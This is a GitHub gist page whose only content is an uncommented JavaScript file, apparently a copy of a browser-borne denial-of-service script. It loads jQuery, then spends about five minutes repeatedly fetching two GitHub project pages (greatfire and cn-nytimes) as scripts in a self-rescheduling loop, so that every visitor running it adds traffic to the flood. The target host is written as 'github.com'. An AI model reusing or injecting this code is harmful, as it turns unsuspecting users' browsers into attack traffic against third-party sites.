Created
September 1, 2017 17:54
-
-
Save masonwr/3605c7b5f565562dfc9e2c3c5ac21a5f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>"); | |
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>"); | |
startime = (new Date).getTime(); | |
var count = 0; | |
function unixtime() { | |
var a = new Date; | |
return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 | |
} | |
url_array = ["https://github.com/greatfire", "https://github.com/cn-nytimes"]; | |
NUM = url_array.length; | |
function r_send2() { | |
var a = unixtime() % NUM; | |
get(url_array[a]) | |
} | |
function get(a) { | |
var b; | |
$.ajax({ | |
url: a, | |
dataType: "script", | |
timeout: 1E4, | |
cache: !0, | |
beforeSend: function() { | |
requestTime = (new Date).getTime() | |
}, | |
complete: function() { | |
responseTime = (new Date).getTime(); | |
b = Math.floor(responseTime - requestTime); | |
3E5 > responseTime - startime && (r_send(b), count += 1) | |
} | |
}) | |
} | |
function r_send(a) { | |
setTimeout("r_send2()", a) | |
} | |
setTimeout("r_send2()", 2E3); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment